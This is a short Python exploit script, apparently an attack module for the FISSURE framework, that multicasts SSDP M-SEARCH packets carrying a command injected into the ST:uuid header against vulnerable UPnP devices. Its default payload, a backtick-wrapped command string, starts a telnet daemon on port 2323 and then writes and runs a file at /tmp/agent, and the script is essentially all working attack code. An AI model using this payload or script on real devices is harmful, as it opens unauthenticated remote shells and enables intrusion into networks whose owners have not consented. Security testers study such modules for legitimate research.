#!/usr/bin/env python

import sys
import os
import struct
import socket
import time


#################################################
############ Default FISSURE Header #############
#################################################
def getArguments():
    injected_command = """`telnetd -p 2323; echo "touch /tmp/test">/tmp/agent; chmod +x /tmp/agent; /tmp/agent`"""
    count = 5
    run_with_sudo = "True"
    notes = 'While joined to the network, injects a command n times via SSDP to a vulnerable UPnP device.'
    
    arg_names = ['injected_command','count','run_with_sudo','notes']
    arg_values = [injected_command, count, run_with_sudo, notes]

    return (arg_names,arg_values)
    
#################################################

if __name__ == "__main__":

    # Default Values
    injected_command = """`telnetd -p 2323; echo "touch /tmp/test">/tmp/agent; chmod +x /tmp/agent; /tmp/agent`"""
    count = 5

    # Accept Command Line Arguments
    try:
        injected_command = sys.argv[1]
        count = int(sys.argv[2])
    except:
        pass

#################################################
    
    # Run the Exploit   
    if count > 0:
        print("Injecting command %s in MSEARCH packet.\n\n" % injected_command)
        msearch_string=\
                    "M-SEARCH * HTTP/1.1\r\n"+\
                    "HOST:239.255.255.250:1900\r\n"+\
                    "ST:uuid:"+str(injected_command)+"\r\n"\
                    "MX:2\r\n"+\
                    'MAN:"ssdp:discover"'+"\r\n\r\n"
        print str(msearch_string)    
        sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)
        sock.setsockopt(socket.IPPROTO_IP,socket.IP_MULTICAST_TTL,2)
        print("Sending...")
        for n in range(0,count):
            sock.sendto(str(msearch_string),("239.255.255.250",1900))
            print(".")
            time.sleep(1)
        sock.close()

        print("Done")
        time.sleep(2)
        print("Exiting")
        time.sleep(2)













